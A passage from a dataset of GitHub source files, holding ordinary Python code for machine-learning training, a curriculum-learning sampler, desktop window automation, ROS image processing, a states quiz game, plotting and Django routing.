self\"\"\"\n\t\treturn deepcopy(self)\n\n\t@property\n\tdef inverse(self):\n\t\t\"\"\"1/this\"\"\"\n\t\tnew = self.copy\n\t\tnew.value = 1/self.value\n\t\tnew.dimensions = {key: -value for key, value in self.dimensions.items()}\n\t\treturn new\n\n\t# properties\n\t@property\n\tdef quantity(self) -> str:\n\t\t\"\"\"Attempt to fetch the name\"\"\"\n\t\tfor dim, name, _ in quantities:\n\t\t\tif dim == self.clean.dimensions:\n\t\t\t\treturn name\n\t\traise KeyError\n\n\t@property\n\tdef unit(self) -> str:\n\t\t\"\"\"Attempt to fetch the unit\"\"\"\n\t\tfor dim, _, unit in quantities:\n\t\t\tif dim == self.clean.dimensions:\n\t\t\t\treturn unit\n\t\traise KeyError(self.dimensions)\n\n\t# double underscore methods\n\tdef __add__(self, other):\n\t\tassert self.dimensions == other.dimensions\n\t\treturn Multidimension(self.value + other.value, self.dimensions, *self.tags)\n\n\tdef __mul__(self, other):\n\t\tif isinstance(other, Dimension):\n\t\t\treturn self * other.multi\n\t\tif isinstance(other, Multidimension):\n\t\t\tdimensions = self.dimensions.copy()\n\t\t\tfor dimension, i in other.dimensions.items():\n\t\t\t\tif dimension in dimensions:\n\t\t\t\t\tdimensions[dimension] += i\n\t\t\t\telse:\n\t\t\t\t\tdimensions[dimension] = i\n\t\t\treturn Multidimension(self.value * other.value, dimensions, *self.tags)\n\t\treturn Multidimension(self.value*other, self.dimensions, *self.tags)\n\n\tdef __neg__(self):\n\t\treturn Multidimension(-self.value, self.dimensions, *self.tags)\n\n\tdef __pos__(self):\n\t\treturn self\n\n\tdef __pow__(self, other):\n\t\tassert isinstance(other, int)\n\t\treturn Multidimension(self.value**other, {t: other*i for t, i in self.dimensions.items()}, *self.tags)\n\n\tdef __repr__(self) -> str:\n\t\treturn f'Multivalue({self.value}, {self.dimensions}, *{self.tags})'\n\n\tdef __rtruediv__(self, other):\n\t\treturn Multidimension(other, {}, *self.tags) / self\n\n\tdef __str__(self) -> str:\n\t\tx = self.value\n\t\tif x < 0:\n\t\t\treturn '-' + str(-self)\n\t\tval, prefix = get_si(x)\n\t\treturn f'{val} {prefix}{self.unit}'\n\n\tdef __sub__(self, other):\n\t\treturn self + -other\n\n\tdef __truediv__(self, other): # possibilities: other is number or dimension\n\t\tdimensions = self.dimensions.copy()\n\t\tif isinstance(other, Dimension):\n\t\t\treturn self / other.multi\n\t\tif isinstance(other, Multidimension):\n\t\t\treturn self * other.inverse\n\t\treturn Multidimension(other / self.value, dimensions, *self.tags)\n","repo_name":"Mocha2007/mochalib","sub_path":"mochaunits.py","file_name":"mochaunits.py","file_ext":"py","file_size_in_byte":11371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10675577819","text":"from __future__ import division\nfrom __future__ import print_function\n\nfrom optimizer import OptimizerTargetOne, OptimizerTargetTwo\nfrom input_data import load_data\nfrom model import TargetOneModel, TargetTwoModel\nfrom preprocessing import preprocess_graph, construct_feed_dict, sparse_to_tuple\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import f1_score, accuracy_score\nfrom sklearn.multiclass import OneVsRestClassifier\n\nimport tensorflow as tf\nimport numpy as np\nimport scipy.sparse as sp\n\nimport time\nimport os\n\n# Train on CPU (hide GPU) due to memory constraints\nos.environ['CUDA_VISIBLE_DEVICES'] = \"\"\n\n\n# Settings\nflags = tf.app.flags\nFLAGS = flags.FLAGS\nflags.DEFINE_float('learning_rate_target_one', 0.01, 'Initial learning rate for learning target 1.')\nflags.DEFINE_float('learning_rate_target_two', 0.01, 'Initial learning rate for learning target 2.')\nflags.DEFINE_integer('target_one_epochs', 300, 'Number of epochs to train for learning-target-one model.')\nflags.DEFINE_integer('target_two_epochs', 300, 'Number of epochs to train for learning-target-two model.')\nflags.DEFINE_integer('hidden1', 1000, 'Number of units in hidden layer 1.')\nflags.DEFINE_integer('hidden2', 200, 'Number of units in hidden layer 2.')\nflags.DEFINE_float('dropout', 0.5, 'Dropout rate (1 - keep probability).')\nflags.DEFINE_float('weight_integration', 0.5, 'Weight for integration for embeddings of learning-target-two model.')\nflags.DEFINE_string('dataset', 'citeseer', 'Dataset string.')\n\ndataset_str = FLAGS.dataset\n\n# Load data\nadj, features, y_train, train_mask, y_all = load_data(dataset_str)\n\nadj = adj - sp.dia_matrix((adj.diagonal()[np.newaxis, :], [0]), shape=adj.shape)\nadj.eliminate_zeros()\n\n# Spectral transform of adjacency matrix\nadj_norm = preprocess_graph(adj)\n\n# Define placeholders\nplaceholders = {\n 'features': tf.sparse_placeholder(tf.float32),\n 'adj_orig': tf.sparse_placeholder(tf.float32),\n 'dropout': tf.placeholder_with_default(0., shape=()),\n 'labels': tf.placeholder(tf.float32),\n 'labels_mask': tf.placeholder(tf.int32)\n}\n\nnum_nodes = adj.shape[0]\n\nfeatures = adj_norm\nnum_features = features[2][1]\nfeatures_nonzero = features[1].shape[0]\n\n# Create models\ntarget_one_model = TargetOneModel(placeholders, num_features, features_nonzero)\ntarget_two_model = TargetTwoModel(placeholders, num_features, features_nonzero, y_train.shape[1])\n\n# Reweights for terms in learning-target-one model's cross entropy loss\npos_weight = float(adj.shape[0] * adj.shape[0] - adj.sum()) / adj.sum()\nnorm = adj.shape[0] * adj.shape[0] / float((adj.shape[0] * adj.shape[0] - adj.sum()) * 2)\n\n\ndef check_multi_label_classification(Y, emb, test_ratio):\n def small_trick(y_test, y_pred):\n y_pred_new = np.zeros(y_pred.shape, np.bool)\n sort_index = np.flip(np.argsort(y_pred, axis=1), 1)\n for i in range(y_test.shape[0]):\n num = int(sum(y_test[i]))\n for j in range(num):\n y_pred_new[i][sort_index[i][j]] = True\n return y_pred_new\n\n x_train, x_test, y_train, y_test = train_test_split(emb, Y, test_size=test_ratio)\n clf = OneVsRestClassifier(LogisticRegression())\n clf.fit(x_train, y_train)\n\n y_pred = clf.predict_proba(x_test)\n ## small trick : we assume that we know how many label to predict\n y_pred = small_trick(y_test, y_pred)\n\n # micro = f1_score(y_test, y_pred, average=\"micro\")\n # macro = f1_score(y_test, y_pred, average=\"macro\")\n # return \"micro_f1: %.4f macro_f1 : %.4f\" % (micro, macro)\n accuracy = accuracy_score(y_test, y_pred, normalize=True)\n return \"accuracy: %.4f\" % accuracy\n\n# Target one optimizer\nwith tf.name_scope('optimizer_for_target_one'):\n opt = OptimizerTargetOne(preds=target_one_model.reconstructions,\n labels=tf.reshape(tf.sparse_tensor_to_dense(placeholders['adj_orig'], validate_indices=False), [-1]),\n pos_weight=pos_weight,\n norm=norm)\n\n# Initialize session\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nadj_label = adj + sp.eye(adj.shape[0])\nadj_label = sparse_to_tuple(adj_label)\n\nfeed_dict = construct_feed_dict(adj_label, features, placeholders)\nfeed_dict.update({placeholders['dropout']: FLAGS.dropout})\n\n# Train learning-target-one model\nfor epoch in range(FLAGS.target_one_epochs):\n\n t = time.time()\n\n outs = sess.run([opt.opt_op, opt.cost, opt.accuracy], feed_dict=feed_dict)\n\n # Compute average loss\n avg_cost = outs[1]\n avg_accuracy = outs[2]\n\n print(\"Epoch:\", '%04d' % (epoch + 1), \"train_loss=\", \"{:.2f}\".format(avg_cost / 100000),\n \"train_acc=\", \"{:.5f}\".format(avg_accuracy), \"time=\", \"{:.5f}\".format(time.time() - t))\n\nprint(\"Optimization Finished for Learning-target-one model!\")\n\nfeed_dict.update({placeholders['dropout']: 0})\ntarget_one_emb = sess.run(target_one_model.z_mean, feed_dict=feed_dict)\n\nprint('Test Classification (training set 10%) for Learning-target-one model: ' + check_multi_label_classification(y_all, target_one_emb, test_ratio=0.9))\n\nprint(\"----------------------------------------------------------------------------------------------------------\")\n\n# Target two optimizer\nwith tf.name_scope('optimizer_for_target_two'):\n opt = OptimizerTargetTwo(preds=target_two_model.outputs,\n labels=target_two_model.labels,\n masks=target_two_model.labels_mask)\n\n# Initialize session\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nfeed_dict = dict()\nfeed_dict.update({placeholders['labels']: y_train})\nfeed_dict.update({placeholders['labels_mask']: train_mask})\nfeed_dict.update({placeholders['dropout']: FLAGS.dropout})\nfeed_dict.update({placeholders['features']: features})\n\n# Train learning-target-two model\nfor epoch in range(FLAGS.target_two_epochs):\n\n t = time.time()\n\n outs = sess.run([opt.opt_op, opt.cost, opt.accuracy], feed_dict=feed_dict)\n\n # Compute average loss\n avg_cost = outs[1]\n avg_accuracy = outs[2]\n\n print(\"Epoch:\", '%04d' % (epoch + 1), \"train_loss=\", \"{:.5f}\".format(avg_cost),\n \"train_acc=\", \"{:.5f}\".format(avg_accuracy))\n\nprint(\"Optimization Finished for Learning-target-two model!\")\n\nfeed_dict.update({placeholders['dropout']: 0})\ntarget_two_emb_1st_hidden_layer = sess.run(target_two_model.hidden1, feed_dict=feed_dict)\nprint('Test Classification (training set 10%) for 1st hidden layer of Learning-target-two model: ' + check_multi_label_classification(y_all, target_two_emb_1st_hidden_layer, test_ratio=0.9))\n\nfeed_dict.update({placeholders['dropout']: 0})\ntarget_two_emb_2nd_hidden_layer = sess.run(target_two_model.embeddings, feed_dict=feed_dict)\nprint('Test Classification (training set 10%) for 2nd hidden layer(embedding) of Learning-target-two model: ' + check_multi_label_classification(y_all, target_two_emb_2nd_hidden_layer, test_ratio=0.9))\n\nprint(\"----------------------------------------------------------------------------------------------------------\")\n\nintegrated_emb = (1 - FLAGS.weight_integration) * target_one_emb + FLAGS.weight_integration * target_two_emb_2nd_hidden_layer\nprint('Test Classification (training set 10%) for the integrated embeddings: ' + check_multi_label_classification(y_all, emb=integrated_emb, test_ratio=0.9))\n","repo_name":"waspzby/elne","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36165681568","text":"import random\nimport numpy as np\nfrom torch.utils.data import Sampler\nfrom rdkit import Chem\nimport copy\nfrom torch.optim import Adam\nfrom rdkit.Chem import AllChem, rdMolDescriptors\nfrom utils import load_model, predict, criterion\nfrom dgllife.utils import RandomSplitter\n\n\ndef cal_diff_feat(args, dataset, train_set):\n \"\"\"\n Calculate difficulty coefficients for training set based on selected difficulty measurer.\n Args:\n dataset: The whole dataset.\n train_set: The training set.\n Returns:\n The numpy array of difficulty coefficients for training set.\n \"\"\"\n smiles = np.array(dataset.smiles)[train_set.indices]\n label = dataset.labels.numpy().squeeze()[train_set.indices]\n diff_feat = []\n if args['diff_type'] in ['LabelDistance', 'Joint', 'Two_stage']:\n pred = train4LabelDistance(args, train_set)\n else:\n pred = [None] * len(smiles)\n print('Difficult Calculate Method: ', args['diff_type'])\n for idx in range(len(smiles)):\n diff = Feat_Calculate(smiles[idx], args['diff_type'], label[idx], pred[idx])\n diff_feat.append(diff.diff_feat)\n return np.array(diff_feat)\n\n\ndef train4LabelDistance(args, train_set):\n \"\"\"\n Acquire the predictions of training set which is used in d_LabelDistance difficulty measurer.\n Args:\n train_set: The training set.\n Returns:\n The prediction results of k teacher models.\n \"\"\"\n from load_data import load_data\n from train import eval_iteration\n print('LabelDistance Training...')\n args_ = copy.deepcopy(args)\n args_['is_Curr'] = False\n model = load_model(args).to(args_['device'])\n loss_criterion = criterion(args_)\n optimizer = Adam(model.parameters(), lr=args_['lr'],\n weight_decay=args_['weight_decay'])\n if args['n_tasks'] > 1:\n pred = np.zeros((len(train_set), args['n_tasks']))\n else:\n pred = np.zeros(len(train_set))\n for train, test in RandomSplitter.k_fold_split(train_set, k=3,\n random_state=args_['seed']):\n print('length of train data:', len(train))\n args_['t_total'] = int(100 * len(train) / args['batch_size'])\n train_loader, _, test_loader = load_data(args_, train,\n None, test, None)\n model.train()\n iter_conut = 0\n for i in range(999):\n if iter_conut == args['t_total']:\n break\n for batch_id, batch_data in enumerate(train_loader):\n smiles, bg, labels, masks = batch_data\n if len(smiles) == 1:\n # Avoid potential issues with batch normalization\n continue\n labels, masks = labels.to(args['device']), masks.to(args['device'])\n prediction = predict(args, model, bg)\n # Mask non-existing labels\n loss = (loss_criterion(prediction, labels) * (masks != 0).float()).mean()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n model.train()\n if iter_conut % int(len(train) / 5) == 0:\n print('iteration {:d}/{:d}, loss {:.4f}'.format(\n iter_conut, args_['t_total'], loss.item()))\n if iter_conut == args_['t_total']:\n break\n iter_conut += 1\n _, pred[test.indices] = eval_iteration(args, model, test_loader)\n return pred\n\n\ndef read_smiles(smi):\n \"\"\"\n Read SMILES from the input file.\n Args:\n smi: The SMILES of the string\n Returns:\n The rdkit rdMol object based on the input SMILES.\n \"\"\"\n rdkit_mol = AllChem.MolFromSmiles(smi)\n if rdkit_mol is None:\n rdkit_mol = AllChem.MolFromSmiles(smi, sanitize=False)\n return rdkit_mol\n\n\nclass Feat_Calculate:\n def __init__(self, smiles, curr_option, label, pred):\n \"\"\"\n Input SMILES strings and the difficulty coefficient calculation option\n Args:\n smiles: The SMILES whose difficulty coefficient to be calculated.\n curr_option: The option for the Curr_learning, choice\n from [AtomAndBond, Fsp3, MCE18, LabelDistance, Joint, Two_Stage]\n The string of the choice for the feature calculation\n label: The true label of training set for d_LabelDistance.\n pred: The predictions of training set for d_LabelDistance.\n \"\"\"\n self.mol = read_smiles(smiles)\n self.label = label\n self.pred = pred\n self.curr_option = curr_option\n if self.curr_option == 'AtomAndBond':\n self.diff_feat = self.calculate_atom_and_bond()\n elif self.curr_option == 'Fsp3':\n self.diff_feat = self.calculate_sp3idx()\n elif self.curr_option == 'MCE18':\n self.diff_feat = self.calculate_MCE18()\n elif self.curr_option == 'LabelDistance':\n self.label = label\n self.pred = pred\n self.diff_feat = self.calculate_LabelDistance()\n elif self.curr_option in ['Joint', 'Two_stage']:\n self.diff_feat = [self.calculate_atom_and_bond(),\n self.calculate_sp3idx(),\n self.calculate_MCE18(),\n self.calculate_LabelDistance()]\n elif self.curr_option == 'None':\n self.diff_feat = []\n elif self.curr_option == 'Ablation':\n self.diff_feat = random.random()\n else:\n self.diff_feat = None\n\n def calculate_atom_and_bond(self):\n \"\"\"\n Calculate the summation of the atom number and bond number\n Returns:\n The difficulty coefficient calculated by d_AtomAndBond.\n \"\"\"\n return self.mol.GetNumAtoms() + self.mol.GetNumBonds()\n\n def calculate_sp3idx(self):\n \"\"\"\n Calculate the content of sp3 carbon atoms in the molecule.\n Returns:\n The difficulty coefficient calculated by d_Fsp3.\n \"\"\"\n n_carbon = 0\n n_sp3ring = 0\n for atom in self.mol.GetAtoms():\n if atom.GetAtomicNum() == 6:\n n_carbon += 1\n if atom.GetTotalDegree() == 4:\n n_sp3ring += 1\n if not n_carbon:\n return 0\n else:\n return n_sp3ring / n_carbon\n\n def calculate_chiral(self):\n \"\"\"\n Calculate the number of the chiral center of the molecule\n for the calculation of d_MCE18.\n \"\"\"\n Chem.AssignStereochemistry(self.mol, flagPossibleStereoCenters=True)\n return rdMolDescriptors.CalcNumAtomStereoCenters(self.mol)\n\n def calculate_fsp3ring(self):\n \"\"\"\n Calculate the Fsp3 ration in all the rings in the molecule\n for the calculation of d_MCE18.\n \"\"\"\n ring_atoms = [i for ring in self.mol.GetRingInfo().AtomRings() for i in ring]\n n_carbon = 0\n n_sp3ring = 0\n for atom_id in ring_atoms:\n atom = self.mol.GetAtomWithIdx(atom_id)\n if atom.GetAtomicNum() == 6:\n n_carbon += 1\n if atom.GetTotalDegree() == 4:\n n_sp3ring += 1\n if not n_carbon:\n return 0\n else:\n return n_sp3ring / n_carbon\n\n def calculate_MCE18(self):\n \"\"\"\n Calculate the MCE18 score, which is the measure of the complexity.\n Returns:\n The difficulty coefficient calculated by d_MCE18.\n \"\"\"\n QINDEX = 3 + sum((atom.GetDegree() ** 2) / 2 - 2 for atom in self.mol.GetAtoms())\n FSP3 = rdMolDescriptors.CalcFractionCSP3(self.mol)\n AR = AllChem.CalcNumAromaticRings(self.mol)\n SPIRO = rdMolDescriptors.CalcNumSpiroAtoms(self.mol)\n NRING = rdMolDescriptors.CalcNumRings(self.mol)\n FSP3RING = self.calculate_fsp3ring()\n CHIRALC = self.calculate_chiral()\n return QINDEX * (2 * FSP3RING / (1 + FSP3) + int(AR > 0) +\n int(AR < NRING) + int(CHIRALC > 0) + int(SPIRO > 0))\n\n def calculate_LabelDistance(self):\n \"\"\"\n Calculate the L1 distance of predict value and true label in train set,\n which is the measure of the complexity.\n Returns:\n The difficulty coefficient calculated by d_LabelDistance.\n \"\"\"\n if type(self.pred) == np.ndarray or type(self.pred) != np.float64:\n return (np.array(self.pred) - np.array(self.label)).mean(axis=0)\n return abs(self.pred - self.label)\n\n\ndef diff_metric_get(args, diff_count):\n \"\"\"\n To get the normalized difficulty coefficients and the sort of training set.\n Args:\n diff_count: The array of the difficulty coefficients of the training set.\n Returns:\n sort: A sort of training set based on its difficulty coefficients.\n cdf: normalized difficulty coefficients.\n \"\"\"\n if args['diff_type'] == 'Joint':\n diff_count = np.stack(diff_count)\n cdf = []\n weight = args['diff_weight']\n count = 0\n for i in range(len(diff_count[0])):\n cdf.append(np.array([len(np.where(\n diff_count[:, i] < count)[0]) / len(diff_count[:, i])\n for count in diff_count[:, i]]))\n # for ablation study to use\n # cdf.append(np.array([(count - diff_count.min())\n # / (diff_count.max() - diff_count.min())\n # for count in diff_count[:, i]]))\n count += 1\n cdf = np.array(cdf).T\n if args['diff_type'] == 'Joint':\n cdf = np.array([weight * (0.3 * i[0] + 0.2 * i[1] + 0.5 * i[2]) +\n (1 - weight) * i[3]\n for i in cdf])\n cdf = np.array([(i - cdf.min()) /\n (cdf.max() - cdf.min()) for i in cdf])\n else:\n cdf = np.array([0.3 * i[0] + 0.2 * i[1] + 0.5 * i[2]\n for i in cdf])\n cdf = np.array([(i - cdf.min()) /\n (cdf.max() - cdf.min()) for i in cdf])\n sort = cdf.argsort()\n return sort, cdf\n elif args['diff_type'] == 'Two_stage':\n diff_count = np.stack(diff_count)\n cdf = []\n weight = args['diff_weight']\n count = 0\n for i in range(len(diff_count[0])):\n cdf.append(np.array([len(np.where(\n diff_count[:, i] < count)[0]) / len(diff_count[:, i])\n for count in diff_count[:, i]]))\n # for ablation study to use\n # cdf.append(np.array([(count - diff_count.min())\n # / (diff_count.max() - diff_count.min())\n # for count in diff_count[:, i]]))\n\n count += 1\n cdf = np.array(cdf).T\n cdf1 = np.array([0.0 * i[0] + 0.0 * i[1] + 1.0 * i[2]\n for i in cdf])\n cdf2 = cdf[:, -1]\n sort1 = cdf1.argsort()\n sort2 = cdf2.argsort()\n return [sort1, sort2], [cdf1, cdf2]\n else:\n sort = diff_count.argsort()\n cdf = np.array([len(np.where(diff_count < count)[0]) /\n len(diff_count) for count in diff_count])\n # for ablation study to use\n # cdf = np.array([(count - diff_count.min())\n # / (diff_count.max() - diff_count.min())\n # for count in diff_count])\n return sort, cdf\n\n\ndef competence_func(t_step: int, t_total: int, c0: float,\n c_type: float, threshold=1.0):\n \"\"\"\n The competence-based training scheduler.\n Args:\n t_step: The current training iteration t.\n t_total: Total training iterations T.\n c0: Initial competence value.\n c_type: The power of the number in competence function.\n threshold: only for ablation study.\n Returns:\n Current competence value.\n \"\"\"\n competence = pow((1 - c0 ** c_type) * (t_step / t_total) + c0 ** c_type, 1 / c_type)\n if competence > threshold:\n competence = threshold\n return competence\n\n\nclass CurrSampler(Sampler):\n \"\"\"\n The sampler based on the CurrMG.\n \"\"\"\n\n def __init__(self, args, diff_feat):\n self.args = args\n self.diff_feat = diff_feat\n\n def __iter__(self):\n self.indices, self.cdf_dis = diff_metric_get(self.args, self.diff_feat)\n return iter([[self.indices, self.cdf_dis]])\n\n def __len__(self):\n return len(self.indices)\n\n\nclass CurrBatchSampler(Sampler):\n \"\"\"\n The batch sampler for the data sample in CurrMG.\n \"\"\"\n\n def __init__(self, sampler, batch_size, t_total,\n c_type, sample_type, threshold=1.0):\n \"\"\"\n Args:\n sampler: torch.utils.data.Sampler,\n The defined Sampler for the data sample, return the\n batch_size: Batch size.\n t_total: Total training iterations T.\n c_type: The power of the number in competence function.\n sample_type: 'Random' or 'Padding-like' sampling type\n ('Random' is used in our manuscript).\n threshold: only for ablation study.\n \"\"\"\n self.sampler = sampler\n self.batch_size = batch_size\n self.t_total = t_total\n self.c_type = c_type\n self.sample_type = sample_type\n self.threshold = threshold\n\n def __iter__(self):\n for sample in self.sampler:\n self.indices = np.array(sample[0])\n self.cdf = np.array(sample[1])\n\n # for ablation study to use\n # self.c0 = 1\n\n for t in range(self.t_total):\n sample_count = np.zeros(len(self.indices))\n if len(self.indices) > 2:\n self.c0 = self.cdf[np.argpartition(self.cdf, self.batch_size - 1)[self.batch_size]]\n c = competence_func(t, self.t_total, self.c0, self.c_type, self.threshold)\n sample_pool = list(np.where(self.cdf <= c)[0])\n if self.sample_type == 'Random':\n sample_all = Random_batch(sample_pool,\n self.batch_size)\n elif self.sample_type == 'Padding-like':\n sample_all, sample_count = PaddingLike_batch(sample_pool,\n sample_count,\n self.batch_size)\n elif len(self.indices) == 2:\n if t < int(self.t_total * 0.6):\n self.c0 = self.cdf[0][np.argpartition(self.cdf[0], self.batch_size - 1)[self.batch_size]]\n c = competence_func(t, int(self.t_total * 0.6),\n self.c0, self.c_type, self.threshold)\n sample_pool = list(np.where(self.cdf[0] <= c)[0])\n sample_all = Random_batch(sample_pool,\n self.batch_size)\n else:\n self.c0 = self.cdf[1][np.argpartition(self.cdf[1], self.batch_size - 1)[self.batch_size]]\n c = competence_func(t, int(self.t_total * 0.4),\n self.c0, self.c_type, self.threshold)\n sample_pool = list(np.where(self.cdf[1] <= c)[0])\n sample_all = Random_batch(sample_pool,\n self.batch_size)\n yield sample_all.tolist()\n\n def __len__(self):\n return len(self.indices)\n\n\ndef Random_batch(sample_pool, batch_size):\n \"\"\"\n The 'Random' sampling type.\n \"\"\"\n return np.random.choice(sample_pool, size=batch_size, replace=False)\n\n\ndef PaddingLike_batch(sample_pool, sample_count, batch_size):\n \"\"\"\n The 'Padding-like' sampling type.\n \"\"\"\n sample_all = np.argpartition(sample_count[sample_pool],\n batch_size - 1)[:batch_size]\n sample_count[sample_all] += 1\n return sample_all, sample_count\n","repo_name":"gu-yaowen/CurrMG","sub_path":"train_sampler.py","file_name":"train_sampler.py","file_ext":"py","file_size_in_byte":16157,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"32"} +{"seq_id":"71045989851","text":"#!/usr/bin/env python3\nimport subprocess\nimport sys\nimport time\n\ndef getwindowlist():\n # get windowlist\n try:\n return [\n l.split()[0] for l in \\\n subprocess.check_output([\"wmctrl\", \"-l\"]).decode(\"utf-8\")\\\n .splitlines()\n ]\n except subprocess.CalledProcessError:\n pass\n\ndef getactive():\n # get active window, convert to hex for compatibility with wmctrl\n wid = str(hex(int(\n subprocess.check_output([\"xdotool\", \"getactivewindow\"])\\\n .decode(\"utf-8\"))))\n return wid[:2]+str((10-len(wid))*\"0\")+wid[2:]\n\n# round down on 2 seconds (match needs to be exact)\nminitime = (int(sys.argv[1])/2)*2\n\nwlist1 = []\ntimerlist = []\n\nwhile True:\n time.sleep(2)\n wlist2 = getwindowlist()\n if wlist2:\n # clean up previous windowlist; remove non- existent windows\n try:\n timerlist = [\n wcount for wcount in timerlist if wcount[0] in wlist2\n ]\n except IndexError:\n pass\n for w in wlist2:\n # add new windows, zero record\n if not w in wlist1:\n timerlist.append([w, 0])\n # add two to account(s)\n for item in timerlist:\n item[1] += 2\n active = getactive()\n for w in timerlist:\n # minimize windows that reach the threshold\n if w[1] == minitime:\n subprocess.Popen([\"xdotool\", \"windowminimize\", w[0]])\n # set acoount of active window to zero\n w[1] = 0 if w[0] == active else w[1]\n wlist1 = wlist2\n","repo_name":"blay/dotfiles","sub_path":"shell/minimize_timer.py","file_name":"minimize_timer.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"34301256020","text":"#!/usr/bin/env python\nimport rospy\nimport numpy as np\nimport cv2\nfrom sensor_msgs.msg import Image\nfrom geometry_msgs.msg import TwistStamped\nfrom cv_bridge import CvBridge\n\ndef gotrgb(rgbimage):\n\timagergb = bridge.imgmsg_to_cv2(rgbimage, desired_encoding=\"bgr8\")\n\timagergb = imagergb[::2,::2]\n\trgb_pub.publish( bridge.cv2_to_imgmsg(imagergb) )\n\ndef gotdepth(depthimage):\n\timagedepth = bridge.imgmsg_to_cv2(depthimage, desired_encoding=\"passthrough\")\n\timagedepth2 = imagedepth[::2,::2]\n\t\n\timagedepth2 = np.where(np.isnan(imagedepth2), np.ma.array(imagedepth2, mask = np.isnan(imagedepth2)).mean(axis=0), imagedepth2)\t\n\tfor i in range(len(imagedepth2)):\n\t\tfor j in range(len(imagedepth2[1])):\n\t\t\tif (imagedepth2[i,j] == 0):\n\t\t\t\timagedepth2[i,j] = np.amax(imagedepth2)\t\n\n\t\t\timagedepth2[i,j] = imagedepth2[i,j]*25.951\n\t\t\tif (imagedepth2[i,j] > 255):\n\t\t\t\timagedepth2[i,j] = 255\n\n\tdepth_pub.publish( bridge.cv2_to_imgmsg(imagedepth2) )\n\n\nif __name__ == '__main__':\n\trgb_sub = rospy.Subscriber('/camera/rgb/image_raw', Image, gotrgb)\n\tdepth_sub = rospy.Subscriber('/camera/depth_registered/image_raw', Image, gotdepth)\n\tbridge = CvBridge()\n\t\n\trgb_pub = rospy.Publisher('/camera/rgb/image_raw_downsampled', Image, queue_size=1)\n\tdepth_pub = rospy.Publisher('/camera/depth_registered/image_raw_downsampled', Image, queue_size=1)\n\trospy.init_node('image_downsampler', anonymous=True)\n\trospy.spin()\n","repo_name":"SunnyDeshpande/Neuro-Navigation","sub_path":"image_downsampler.py","file_name":"image_downsampler.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42847068595","text":"import turtle\r\nimport pandas\r\nfrom show_state import ShowState\r\n\r\n\r\ndef return_cordinates(df_name, answer_state):\r\n \"\"\"Returns (x, y) position of state on the screen\"\"\"\r\n state = df_name[df_name[\"state\"] == answer_state]\r\n state_x = int(state[\"x\"])\r\n state_y = int(state[\"y\"])\r\n return (state_x, state_y)\r\n\r\nscreen = turtle.Screen()\r\nscreen.title(\"U.S. States Game\")\r\nimage = \"blank_states_img.gif\"\r\nscreen.addshape(image)\r\nturtle.shape(image)\r\n\r\n# get coordinates on click\r\n# import get_mouse_click_cor\r\n# turtle.onscreenclick(get_mouse_click_cor.get_mouse_click_coor())\r\ndata = pandas.read_csv(\"50_states.csv\")\r\nstates_list = data[\"state\"].to_list()\r\ncorrect_guesses = []\r\n\r\n# MAIN\r\nwhile len(correct_guesses) < 50:\r\n answer_state = (screen.textinput(title=f\"{len(correct_guesses)}/50 Guess the State\", prompt=\"Type the name of State\")).title()\r\n if answer_state == \"Exit\":\r\n break\r\n if answer_state in states_list:\r\n correct_guesses.append(answer_state)\r\n position = return_cordinates(df_name=data, answer_state=answer_state)\r\n show_state = ShowState(answer_state, position)\r\n\r\n# not_guessed = list(set(states_list) - set(correct_guesses))\r\n# solution from next lesson day 26 exercise 4\r\nnot_guessed = [not_guessed_state for not_guessed_state in states_list if not_guessed_state not in correct_guesses]\r\nto_learn_data = pandas.DataFrame(not_guessed)\r\nto_learn_data.to_csv(\"a.csv\")\r\n\r\n","repo_name":"hubs0n93/100_days_of_code_py","sub_path":"day-25-27_csv_list_comprehension_GUI/25/US_state_game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33925764299","text":"import matplotlib.pyplot as plt\n\nlabels= 'Delhi','Patna','Gwalior','Raipur'\nsizes = [45,30,15,10]\nexplode =(0,0.1,0,0)\n\nfig1, ax1 = plt.subplots()\nax1.pie(sizes, explode=explode,labels=labels, autopct =\"% 1.1f %%\",shadow=True,startangle=90)\nax1.axis('equal')\nplt.title(\"Pollution rank among cities\")\nplt.show()","repo_name":"radhikascs/python-data-science-examples","sub_path":"activity6.py","file_name":"activity6.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10438209526","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('get-send-mails', views.CreateAndGetPosts.as_view()),\n path('get-sent-mails', views.get_sent_mails),\n path('get-replies/', views.get_replies),\n path('mail-detail/', views.MailDetail.as_view()),\n path('delete-mail/', views.DeleteMail.as_view()),\n]","repo_name":"amirrzw/made_in_lobby_email","sub_path":"mails/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27127235840","text":"'''\nDesigner notes:\n\nThe function performs a search algorithm on the \"condensed_data array\" (target \nroom) to find the coordinates of the rectangular area (with length \"w\" and \n\"width h\") that has the lowest average EMI (electromagnetic interference) value\nand meets the EMI requirement specified by device specification(EMI_max).\n\nTo do this, the function first performs a data preprocessing step on the \n\"condensed_data array\" to generate two new arrays: \"sum_preprocess_list\" and \n\"detection_preprocess_list\". These arrays are used to quickly calculate the EMI\nsum and number of points that do not meet the EMI requirement for any \nrectangular area of the condensed_data array.\n\nThe function then iterates through the \"condensed_data array\" to check each \nrectangular area with length \"l\", width \"w\" and height \"h\". For each \nrectangular area, the function uses the \"sum_preprocess_list\" to quickly \ncalculate the average EMI in curret rectangular area 